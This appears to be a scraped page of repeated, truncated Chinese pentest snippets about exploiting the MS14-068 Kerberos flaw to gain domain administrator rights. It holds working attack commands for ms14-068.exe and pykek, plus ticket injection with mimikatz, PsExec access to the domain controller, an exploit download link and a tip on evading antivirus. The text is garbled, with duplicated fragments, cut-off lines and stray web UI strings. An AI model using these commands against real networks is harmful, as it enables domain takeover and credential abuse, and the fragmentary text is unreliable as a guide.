ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。 python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16....
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。 python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16....
因为这个exe会被杀,所以可以本地生成然后上传到控制的主机 使用ms14-068.exe进行生成票据,这里需要明文密码进行生成 下载地址:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068 MS14-068.exe -u marry@sec.sec.jack.com -p 123321Zxc -s S-1-5-21-2458970936-1815464311-433572238-1126 -...
使用ms14-068来产生一张高权限的berberos服务票据,并注入到内存中: ms14068.exe /domain:xxx.com /user:jack /password:jackpwd/ /ptt 再测试访问: 测试psexec无密码登陆 很棒,达到了我们想要的效果。 如果想生成一张kerberos票据,做票据传递攻击(ptt),可以这样: ms14068.exe /domain:xxxcom /sid:S-1-5-...
ms-14-068.exe -u 域用户@域控名 -p 域用户密码 -s 域用户sid -d 域ip 参数说明: -u 域账号+@+域名称,这里是ts1+@+yunying.lab -p 为当前用户的密码,即ts1的密码 -s为ts1的SID值,可以通过whoami/all来获取用户的SID值 -d为当前域的域控 获取到TGT文件以后,用mimikatz.exe将证书写入,从而提升...
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 如果操作正确,且域机器是可以和域控制器互通则会创建.ccache文件 ...
ms14068.exe/domain:xxx.com/user:jack/password:jackpwd//ptt 再测试访问: 测试psexec无密码登陆 很棒,达到了我们想要的效果。 如果想生成一张kerberos票据,做票据传递攻击(ptt),可以这样: 代码语言:javascript 代码运行次数:0 运行 AI代码解释 ms14068.exe/domain:xxxcom/sid:S-1-5-21-2666969376-4225180350-...
ms14-068.exe -u 域成员名@域名-s 域成员sid -d 域控制器地址 -p 域成员密码 在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。 代码语言:javascript 代码运行次数:0 运行 AI代码解释 ...
ms14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码 在Pykek目录中输入如下命令,如图6-52所示,在当前目录生成了一个名为TGT_user1@pentest.com.ccache的票据文件。 python ms14-068.py -u user@pentest.com -s S-1-5-21-3112629480-1751665795-4053538595-1104 -d 172.16...
利用mimikatz.exe将证书写入,从而提升为域管理员 kerberos::ptc 你的证书名字 写入成功后,使用PsExec.exe以管理员权限运行连接域控 原理解析 0x04 Kerberos流程 域内主机请求处理流程 0x05 PAC原理 Server收到Client发来的TGS后,要根据TGS中Client申明所在的域组,和Server上的ACL进行对,然后决定给予Client什么样的资...